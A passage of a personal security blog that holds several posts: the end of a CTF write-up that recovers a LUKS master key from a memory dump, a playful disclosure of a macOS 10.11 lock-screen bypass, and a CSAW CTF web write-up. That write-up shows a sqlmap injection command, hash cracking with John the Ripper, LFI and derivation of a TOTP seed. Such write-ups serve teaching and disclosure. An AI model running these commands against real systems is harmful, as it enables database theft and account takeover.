dd if=/dev/zero of=test.img conv=notrunc bs=1024 count=1<br />
hexdump -C -v -n 80 test.img<br />
echo 1fab015c1e3df9eac8728f65d3d16646 | xxd -r -p > key.bin</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8vitnVHsq3GHaW9XM8paS__C3XZ5_dqqTtk5OxUl_tyUxm4yd8anm-nyPun9MccEKRHSMupu9ebN2yrUWMJOXKbJEcOca33zdmwWl4l3PwuwrJQ6k1A8AHtQErkcCPdD94B0yFqm0EWxc/s1600/Screenshot-Terminal-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8vitnVHsq3GHaW9XM8paS__C3XZ5_dqqTtk5OxUl_tyUxm4yd8anm-nyPun9MccEKRHSMupu9ebN2yrUWMJOXKbJEcOca33zdmwWl4l3PwuwrJQ6k1A8AHtQErkcCPdD94B0yFqm0EWxc/s400/Screenshot-Terminal-3.png" width="400" /></a></div>
<br />
<div class="code">
cryptsetup luksFormat --verify-passphrase --cipher=aes-ecb --hash=sha1 --key-size=128 --master-key-file=key.bin test.img</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4PdxzFXy4H2bB7IQelWf0Vb5oHS3PxFyKpJFRn-TVJkXYtNCy5swdNdfotsDj4A2FbHeCNkgPXea22JpDvEIbd4wBYwNEc9LLbnFZCswSWgl9M184lGWrGgHBWKyaDy6RlGmBM5UqxanO/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4PdxzFXy4H2bB7IQelWf0Vb5oHS3PxFyKpJFRn-TVJkXYtNCy5swdNdfotsDj4A2FbHeCNkgPXea22JpDvEIbd4wBYwNEc9LLbnFZCswSWgl9M184lGWrGgHBWKyaDy6RlGmBM5UqxanO/s400/Screenshot-Terminal-4.png" width="400" /></a></div>
<br />
They tried to hide the flag from "/bin/cat" using the carriage return char (0x0D), but hexdump and Pluma had no problems displaying it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Off_ltW8nYdsITjSlEeFqYCAr9LQrn5oxiePU_xjF1g7VWV5quhjhkciryRB64H2BdkQ_Xf01mq6s6kDDPuM3GoEx2DsP9i3v1GEf3Ql-PNdOXSPXNCUo1NACxmgunhFJHq4RHqzfcnh/s1600/final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Off_ltW8nYdsITjSlEeFqYCAr9LQrn5oxiePU_xjF1g7VWV5quhjhkciryRB64H2BdkQ_Xf01mq6s6kDDPuM3GoEx2DsP9i3v1GEf3Ql-PNdOXSPXNCUo1NACxmgunhFJHq4RHqzfcnh/s400/final.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYcvW9by1nWKuo6cfp6wfWHB98vM6Xqx5-kRyAhoUqncQeEbtX7PLBMEaYwdexG3bHWKmFs6QeycaFwhGDtO_-i9D3zJ0-X5_bdZTLSq7jzsUniD9jwNf14KIEH5A5HRC4fWSOdx_Qf27g/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYcvW9by1nWKuo6cfp6wfWHB98vM6Xqx5-kRyAhoUqncQeEbtX7PLBMEaYwdexG3bHWKmFs6QeycaFwhGDtO_-i9D3zJ0-X5_bdZTLSq7jzsUniD9jwNf14KIEH5A5HRC4fWSOdx_Qf27g/s400/Screenshot-Terminal-5.png" width="400" /></a></div>
<br />
<br />
Flag: <b>flag{v0t3_f0r_p3dr0}</b><br />
<b><br /></b>
<b><br /></b><b>Update 1: </b><a href="https://twitter.com/rbaranyi">@rbaranyi</a> and <a href="https://plus.google.com/107016163963660206221">David Berard</a> pointed out that replacing '/etc/shadow', login with the known password and then use 'strings /dev/lvm' would be easier. That's true, but that wouldn't involve any kind of <a href="http://cdn.meme.am/instances/500x/65198356.jpg">memory inception</a>.<br />
<br />
<b>Update 2: </b><a href="https://plus.google.com/107016163963660206221">David Berard</a> pointed out that <a href="https://gitlab.com/cryptsetup/cryptsetup/wikis/FrequentlyAskedQuestions#6-backup-and-data-recovery">newer 'cryptsetup' offers an option to set a new passphrase using the master key</a>: 'cryptsetup luksAddKey --master-key-file=<master-key-file> <luks device>'<br />
<br />
<b>Update 3:</b> According to the <a href="https://github.com/xwings/tuya/tree/master/ctf2015/hack.lu/drbob150">writeup from CLGT</a>, you can also dump VirtualBox RAM using this administrative command: 'VBoxManage debugvm SafeClone dumpvmcore --filename=getthekey'<br />
<br />
<b>Update 4:</b> Some teams used the <a href="https://github.com/c1fe/dm_dump/">dm_dump</a> volatility plugin: it identifies disks on the target system which were mounted using the device-mapper framework. The output of this plugin gives you the arguments to pass to the dmsetup command to remount the original unencrypted file system on a different machine.<br />
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com4tag:blogger.com,1999:blog-3296471108082693838.post-14134944204402547312015-10-07T11:18:00.001-03:002015-10-07T11:26:14.058-03:00Mac OS X 10.11 Partial Lock Screen BypassLock screen bypasses are becoming mainstream. The most notable recent bypasses are <a href="https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572">the one from Ubuntu 14.04</a> (hold enter, lock screen crashes, computer unlocked) and <a href="http://sites.utexas.edu/iso/2015/09/15/android-5-lockscreen-bypass/">the one from Android 5.x</a> (input large strings in the password field, destabilize the lock screen, crash to the home screen).<br />
<br />
Many respected researcher had found and published something about this class of bugs and this blog is no different: this post describes a <strike>completely useless</strike> <a href="https://www.youtube.com/watch?v=h05YfP_8UsU">super serious</a> vulnerability affecting Mac OS X 10.11 and earlier.<br />
<br />
<b>Mac OS X 10.11 Partial Lock Screen Bypass</b><br />
<br />
Mac OS X 10.11 (and probably older versions) are vulnerable to a partial lock screen bypass. This is not a *complete* lock screen bypass as you won't be able to freely interact with the Desktop (as far as I know). Here are the steps to reproduce this bug:<br />
<br />
1 - Hit the <b>Exposé Key (F3)</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjko-WO4OlQ9gV6By9gN_RsL_q3pEoVrOMsOTRf2-jzui1QFd1nEel9uMZPed8yYar8ok1DDWP9pME-kr_OIMXWT0mIJ5iWC8_dt7hAmQq7CQwbo2uIpxJtKbn2wx4HgVgjHd42BSY9HPL3/s1600/Screen+Shot+2015-10-07+at+1.43.38+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjko-WO4OlQ9gV6By9gN_RsL_q3pEoVrOMsOTRf2-jzui1QFd1nEel9uMZPed8yYar8ok1DDWP9pME-kr_OIMXWT0mIJ5iWC8_dt7hAmQq7CQwbo2uIpxJtKbn2wx4HgVgjHd42BSY9HPL3/s400/Screen+Shot+2015-10-07+at+1.43.38+AM.png" width="400" /></a></div>
<br />
<br />
2 - Click on any window and keep holding it<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdZYKgmDyklZMm_mYapq0IN3q6W22Cu0Hbp08k4BURgJo7RNmI8corKFLk5_UhMZxkskx9xK8W0QVu5uyunmjjh-Qor8jt1Fek4p8nWVakxyJO8ImJBC4J6WkpqC6kk9mHBTaFWr_5eHw_/s1600/Screen+Shot+2015-10-07+at+1.43.56+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdZYKgmDyklZMm_mYapq0IN3q6W22Cu0Hbp08k4BURgJo7RNmI8corKFLk5_UhMZxkskx9xK8W0QVu5uyunmjjh-Qor8jt1Fek4p8nWVakxyJO8ImJBC4J6WkpqC6kk9mHBTaFWr_5eHw_/s400/Screen+Shot+2015-10-07+at+1.43.56+AM.png" width="400" /></a></div>
<br />
<br />
3 - Keep holding the left mouse button and lock the screen using <b>Command + Option + Eject </b>(hold all these keys together for some time)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFh6pvWnydcxuzquvcGggmD3t_g8AaXquEeRcyKH3Jobik4LBH0WpkU-cgLsJjDGpenqBI6Nwo0lYXcnHOrDKAdF49E2RQEc-nePNv_9bSz6F9X52vKrANwyRcJUoj7byQB1Dt4z6CeV-/s1600/Screen+Shot+2015-10-07+at+1.48.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFh6pvWnydcxuzquvcGggmD3t_g8AaXquEeRcyKH3Jobik4LBH0WpkU-cgLsJjDGpenqBI6Nwo0lYXcnHOrDKAdF49E2RQEc-nePNv_9bSz6F9X52vKrANwyRcJUoj7byQB1Dt4z6CeV-/s400/Screen+Shot+2015-10-07+at+1.48.54+AM.png" width="400" /></a></div>
<br />
<br />
That's it, now the lock screen has an "extra layer" with the miniaturised desktop windows. If you move the mouse cursor over the correct application position and hit the <b>Space Key</b>, a bigger window will be displayed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Vc6VWP_y-fA90B4nVrG2LVQdObgOb1AQ13_U6fb5UmS0QGTMBVyUZJLxWix6yiXFyspPkvkhyphenhyphenpNKsTDdTgnYpnTg6pC6exaahPO49vK9AQi1eRMMzGzWeIEunAvynRerTnDXDaZcfwoe/s1600/Screen+Shot+2015-10-07+at+2.08.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Vc6VWP_y-fA90B4nVrG2LVQdObgOb1AQ13_U6fb5UmS0QGTMBVyUZJLxWix6yiXFyspPkvkhyphenhyphenpNKsTDdTgnYpnTg6pC6exaahPO49vK9AQi1eRMMzGzWeIEunAvynRerTnDXDaZcfwoe/s320/Screen+Shot+2015-10-07+at+2.08.54+AM.png" width="320" /></a></div>
<br />
<br />
You can watch Youtube videos and interact with media players (Quicktime, Spotify etc) using the media control keys. You can't interact directly with the app: if you left-click on the windows or hit Enter, the lock screen takes over that invisible layer.<br />
<br />
Proof-of-concept - Mac OS X 10.11:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/lDkJ0XtIrxk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/lDkJ0XtIrxk?feature=player_embedded" width="320"></iframe></div>
<br />
If Youtube is blocking the video in your country, watch it here:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/yQ8SYyP4-Uw/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/yQ8SYyP4-Uw?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
If you are a serious tech journalist reporting about this <strike>bug</strike> feature, don't forget to say that this is specially useful to play Youtube and Spotify playlists during parties at a friend's house. You don't want to leave you Mac logged in and unattended, so you simply preload the playlist and lock the screen using this cool technique.<br />
<br />
<br />
<b>Bonus: Mac OS X 10.11 Hidden Window Bug</b><br />
<br />
This is yet another <strike>useless</strike> <a href="https://www.youtube.com/watch?v=nGf3PdZviXk">totally serious</a> bug affecting the new Mac OS X El Capitain. You can hide an application window from the user by moving them to another display and alternating the screen mirroring options. Here are the steps to reproduce this bug:<br />
<br />
1 - Connect your monitor to an external display ("Use As Separate Display")<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhP-DVQImHh4ce8BCenmmUvYowW5GgQ9Ag2u1QryJoYLrS5HGV6YMHlJAjyzwAz7PBZvGd3WimIi2rkX6zwPQOKLA7aOB-SkVzH2CTZTeHJIfH228_BHwSCnJjEyfsXzUfNo5tEoPtfW9R/s1600/Screen+Shot+2015-10-07+at+2.10.37+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhP-DVQImHh4ce8BCenmmUvYowW5GgQ9Ag2u1QryJoYLrS5HGV6YMHlJAjyzwAz7PBZvGd3WimIi2rkX6zwPQOKLA7aOB-SkVzH2CTZTeHJIfH228_BHwSCnJjEyfsXzUfNo5tEoPtfW9R/s320/Screen+Shot+2015-10-07+at+2.10.37+AM.png" width="320" /></a></div>
<br />
2 - Move the window you want to hide to the secondary display<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCZbVeRNEDExMwpv7G_s7M8JmH982TeNxsw0eG7JlYy5lbo-cGR-AJZb2e47kpw9PBcdOBmrwtgNW5nHNKdTJxQEjVRefCg5G3EmHdmY7nPS4Dyhd_bQJXG30OLWIqKgKVdOsHnnuxBaWV/s1600/Screen+Shot+2015-10-07+at+2.25.33+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCZbVeRNEDExMwpv7G_s7M8JmH982TeNxsw0eG7JlYy5lbo-cGR-AJZb2e47kpw9PBcdOBmrwtgNW5nHNKdTJxQEjVRefCg5G3EmHdmY7nPS4Dyhd_bQJXG30OLWIqKgKVdOsHnnuxBaWV/s400/Screen+Shot+2015-10-07+at+2.25.33+AM.png" width="400" /></a></div>
3 - Hit the <b>Exposé Key (F3)</b>, move the mouse cursor over the window you want to hide and hit the <b>Space Key</b>.<br />
<br />
4 - Alternate the screen mirroring options by inputting <b>Command + F1</b><br />
<br />
5 - The window is gone (OMGBBQ!!!)<br />
<br />
Proof-of-concept - Mac OS X 10.11:<br />
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/g5RmxeP_2dk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/g5RmxeP_2dk?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
<div>
I personally use this to hide all the Mac applications from coworkers who leave their computers unlocked and unattended.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKHvPhAzfFwM3rXpbN4PDmKqVwRBBtgrJ7Ge2bk0oCU-8GTZ0fwJ1cKfYXtg5FdEmU7YhR4L3EmctgjXhyz_SDGDMWILELHo0P3inxzP2pPIsT9cI962QvSQ3hS5YoDtsZdZwfMAqNnzng/s1600/evilest.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKHvPhAzfFwM3rXpbN4PDmKqVwRBBtgrJ7Ge2bk0oCU-8GTZ0fwJ1cKfYXtg5FdEmU7YhR4L3EmctgjXhyz_SDGDMWILELHo0P3inxzP2pPIsT9cI962QvSQ3hS5YoDtsZdZwfMAqNnzng/s320/evilest.gif" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-74438714465523387022015-09-20T19:30:00.001-03:002015-09-21T20:34:10.482-03:00CSAW CTF 2015 Write Up: Weebdate (web500)The anual CSAW CTF Qualification Round took place on September 18-20 and it was yet another really cool CTF. I played with my friends from TheGoonies and we ranked #128 overall (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>).<br />
<br />
<b>Task - Weebdate (web500)</b><br />
<br />
<div class="code">
Since the Ashley Madison hack, a lot of high profile socialites have scrambled to find the hottest new dating sites. Unfortunately for us, that means they're taking more safety measures and only using secure websites. We have some suspicions that Donald Trump is using a new dating site called "weebdate" and also selling cocaine to fund his presidential campaign. We need you to get both his password and his 2 factor TOTP key so we can break into his profile and investigate.<br />
<br />
Flag is md5($totpkey.$password)<br />
<br />
http://54.210.118.179/</div>
<br />
This is a basic Flask application running a dating site. The website has some features like most web applications we are used to: creating users, editing profiles, sending messages, searching users and <a href="https://en.wikipedia.org/wiki/Ashley_Madison_data_breach">exposing the whole customer data</a> thourgh SQL Injection and LFI.<br />
<br />
<b>SQLi</b><br />
<br />
The CSP reporting URI was vulnerable to SQL injection. SQLmap had no problems finding and exploiting it.<br />
<br />
<div class="code">
python sqlmap.py -u 'http://54.210.118.179:80/csp/view/1' --cookie='session=donaldtrump010_1442717300_f65cb746b519c2b49f8e938a896e08e96f5fc533' --dbms=mysql --batch
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1xrxGSKaVdZ3CdnD03FTyYcvspMR0U5z9OC42qWiD8YkJIKsUqrVtbXvmoQd2zkwHfwIRQtajrjU-lZmmX6kHSEynMqZZJ2ywtC-lAByYl6rlWw-7lkTLGCCNMVQHFtiK8wYlNvmCF0k/s1600/sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1xrxGSKaVdZ3CdnD03FTyYcvspMR0U5z9OC42qWiD8YkJIKsUqrVtbXvmoQd2zkwHfwIRQtajrjU-lZmmX6kHSEynMqZZJ2ywtC-lAByYl6rlWw-7lkTLGCCNMVQHFtiK8wYlNvmCF0k/s640/sqli.png" width="532" /></a></div>
The 'weeb' database had three tables: messages, reports and users. The 'user' table had eight columns: user_id, user_name, user_password, user_ip, user_image, user_credits,<br />
user_register_time and user_profile.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTciVYvVidhk-0RVcJibyTxLOMHMm9XN4kPjgXdElGbJasMEw6wI3ulPOoJcxEVT2SpPlP7DaQj-sQkFcOXe7NtJxTaNbDa5HxbEQNyYVRB4iW3sh-Y7Pnw8KnYgwTkc4JFf5uz1psKxxK/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTciVYvVidhk-0RVcJibyTxLOMHMm9XN4kPjgXdElGbJasMEw6wI3ulPOoJcxEVT2SpPlP7DaQj-sQkFcOXe7NtJxTaNbDa5HxbEQNyYVRB4iW3sh-Y7Pnw8KnYgwTkc4JFf5uz1psKxxK/s640/Capturar.PNG" width="640" /></a></div>
<br />
<br />
Passwords had a SHA256 pattern so I quickly started cracking them using John The Ripper:<br />
<br />
<div class="code">
john --format=raw-sha256 hash.txt --wordlist=rockyou.txt</div>
<br />
Most cracked passwords had patterns like 'testtest', 'lablab' and 'guest1guest1'. After some time I realised that the username was used as a <a href="https://en.wikipedia.org/wiki/Salt_(cryptography)">Salt</a>. I generated a small wordlist concatenating donaldtrump's user and password and I finally managed to crack it:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vQH11eWD5wE6kAp7ZlUtVuBocrFV_JyJ6BQ07ydSZw2U0aPfGJyXubbeRoImhxozIy-EjvwlikN-DTg_La54WqhCJlX_PrnDi-s52lzDQcpAQnHVogby7eyeydIc_sxaFAKSZ3hOX6U-/s1600/crack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="502" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vQH11eWD5wE6kAp7ZlUtVuBocrFV_JyJ6BQ07ydSZw2U0aPfGJyXubbeRoImhxozIy-EjvwlikN-DTg_La54WqhCJlX_PrnDi-s52lzDQcpAQnHVogby7eyeydIc_sxaFAKSZ3hOX6U-/s640/crack.PNG" width="640" /></a></div>
<br />
<br />
The login form displays "Invalid verification code" when you type a wrong TOTP verification code and it returns "Invalid credentials" when you mistype the password. I knew that his password was 'zebra' but I still needed to find out the TOTP algorithm in order to steal his seed.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_aVKewbLLZCzPrPx5oJOYvHHJZ3hFwRmX_HwUX5-PFowngPXX7eITcicHdfg9PL0HWfRbuO2ZjWw33Qfj7ex8qgSzRrnaEUWc83SCFAOh5pr5Gsr-C5o3o6vN8C_h_3FlfFVJW1LlKQ_V/s1600/Screen+Shot+2015-09-20+at+6.55.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="515" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_aVKewbLLZCzPrPx5oJOYvHHJZ3hFwRmX_HwUX5-PFowngPXX7eITcicHdfg9PL0HWfRbuO2ZjWw33Qfj7ex8qgSzRrnaEUWc83SCFAOh5pr5Gsr-C5o3o6vN8C_h_3FlfFVJW1LlKQ_V/s640/Screen+Shot+2015-09-20+at+6.55.41+PM.png" width="640" /></a></div>
<b>LFI</b><br />
<br />
The 'image_url' parameter from '/profile/edit' was vulnerable to LFI, displaying the full content from local files:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPKFVD6IZxNyE70dbXxU8X7MBaBkt00iXyvr0R-JmIe5iIpejhFinRCKYWn4SPVyss3lvfWUVFm3y5ZJHRgPyQSrXgGaMgKfLH6pUuDOFhHwcqN6hsc15wA1FPnDBA0iSn5s_xiM-_wMKW/s1600/Screen+Shot+2015-09-20+at+7.01.16+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPKFVD6IZxNyE70dbXxU8X7MBaBkt00iXyvr0R-JmIe5iIpejhFinRCKYWn4SPVyss3lvfWUVFm3y5ZJHRgPyQSrXgGaMgKfLH6pUuDOFhHwcqN6hsc15wA1FPnDBA0iSn5s_xiM-_wMKW/s640/Screen+Shot+2015-09-20+at+7.01.16+PM.png" width="640" /></a></div>
<br />
<br />
A curious note here is that it was the first time I managed to find a bug using <a href="https://portswigger.net/burp/help/collaborator.html">Burp Collaborator</a>. The scanner identified the external HTTP/DNS interaction and after some digging I quickly found the LFI =)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBCnOWp5U7TbtMCo447179QugKLyA8hnWpqml1UrttmPigtf62D46S4LYaSQiWNXYHUcKmG19m8olFIxMiHXLJ1syRaIAipdgXTLwWKwUKlF_2-6cM5T5pY6yC1QE2PM8MiyWK7o0s0E/s1600/collab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBCnOWp5U7TbtMCo447179QugKLyA8hnWpqml1UrttmPigtf62D46S4LYaSQiWNXYHUcKmG19m8olFIxMiHXLJ1syRaIAipdgXTLwWKwUKlF_2-6cM5T5pY6yC1QE2PM8MiyWK7o0s0E/s640/collab.png" width="640" /></a></div>
After <strike>some</strike> a lot of time bruteforcing the dirs and files, we managed to find the server root:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbtN_KxvHplcHYNhaR4eE1j6mzndMmxtCZ4AgtqafHUuvoIKCkQ6hchpKotudMQlRDRPwmGdIV8VncSrBwnOwl-o0ftGnXOB5_OaGVyANCbTTK1HFCSbF1g7IndO9eZVJ9QJuGg78fcL6k/s1600/brute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="488" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbtN_KxvHplcHYNhaR4eE1j6mzndMmxtCZ4AgtqafHUuvoIKCkQ6hchpKotudMQlRDRPwmGdIV8VncSrBwnOwl-o0ftGnXOB5_OaGVyANCbTTK1HFCSbF1g7IndO9eZVJ9QJuGg78fcL6k/s640/brute.png" width="640" /></a></div>
We are particularly interested on the generate_seed() function:<br />
<br />
- <u>server.py</u><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gweQoRFFEzPCIuwxJONpJSJJW_uHVoBiVv640hOfblb_QwQQlG_Anmc9-2dAWARm-QUIS3J5BqpGg46eq_Ibv1-FbvP8MEfLZgOYoIrC0t1DX1xJpV_qlKaMnGqWh40WMmEFJfNe9fuh/s1600/Screen+Shot+2015-09-20+at+7.10.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gweQoRFFEzPCIuwxJONpJSJJW_uHVoBiVv640hOfblb_QwQQlG_Anmc9-2dAWARm-QUIS3J5BqpGg46eq_Ibv1-FbvP8MEfLZgOYoIrC0t1DX1xJpV_qlKaMnGqWh40WMmEFJfNe9fuh/s640/Screen+Shot+2015-09-20+at+7.10.00+PM.png" width="640" /></a></div>
<br />
- <u>utils.py</u><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiofoojdH3E8d1nPkob4i5-qQyemzK6paIEur2tjGmyRQ3VtzDPUErh-MZzJGGLpHwCUL1ZWZ2jLJjCJTtTthkuvN3_SFDWvkTDWVcetfqsp8kJe3UDOQNJwfFuJBB3dH8SHURQwG3GghF8/s1600/Screen+Shot+2015-09-20+at+7.09.16+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiofoojdH3E8d1nPkob4i5-qQyemzK6paIEur2tjGmyRQ3VtzDPUErh-MZzJGGLpHwCUL1ZWZ2jLJjCJTtTthkuvN3_SFDWvkTDWVcetfqsp8kJe3UDOQNJwfFuJBB3dH8SHURQwG3GghF8/s640/Screen+Shot+2015-09-20+at+7.09.16+PM.png" width="640" /></a></div>
<br />
The TOTP is not stored server-side: it is generated at runtime using a seed based on the username and his registration IP Address. We had the user IP address from the SQLi dump and we can now use the get_otp_key() function to generate his TOTP key:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnReEC74mdUQ62mLfGO_xvMmyYKRFYUZCOOddn05u95jLXrSZ0TgGmLdFba2OiZi5mkQP0KO3M-EDDwG510kvSmxPH_8PQFwT5el_1y8dIpLW6EMZaFMgV3QCyGjwhSdQzVOZmYULHdFFE/s1600/Screen+Shot+2015-09-20+at+7.17.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnReEC74mdUQ62mLfGO_xvMmyYKRFYUZCOOddn05u95jLXrSZ0TgGmLdFba2OiZi5mkQP0KO3M-EDDwG510kvSmxPH_8PQFwT5el_1y8dIpLW6EMZaFMgV3QCyGjwhSdQzVOZmYULHdFFE/s640/Screen+Shot+2015-09-20+at+7.17.49+PM.png" width="640" /></a></div>
The flag is the md5($totpkey.$password): <b style="text-align: center;">a8815ecd3c2b6d8e2e884e5eb6916900</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfiT7Y5QnsOgQESD_imPsEBJIZIzC6rL1OvQrtAKhnEshiqA0l-wZ8dYvS8POC1fw5OjVL3gsqhqELnLUsZ8xFv0S3LHzDk4an3UdruQm0iUqbFXqyzbU1OuNpGgF4LqO3eUtObvfGswl/s1600/Screen+Shot+2015-09-20+at+7.24.03+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfiT7Y5QnsOgQESD_imPsEBJIZIzC6rL1OvQrtAKhnEshiqA0l-wZ8dYvS8POC1fw5OjVL3gsqhqELnLUsZ8xFv0S3LHzDk4an3UdruQm0iUqbFXqyzbU1OuNpGgF4LqO3eUtObvfGswl/s640/Screen+Shot+2015-09-20+at+7.24.03+PM.png" width="640" /></a></div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-5954158730381861442015-02-26T11:11:00.001-03:002015-02-27T00:56:54.499-03:00Extracting RAW pictures from memory dumps<b>Introduction</b><br />
<br />
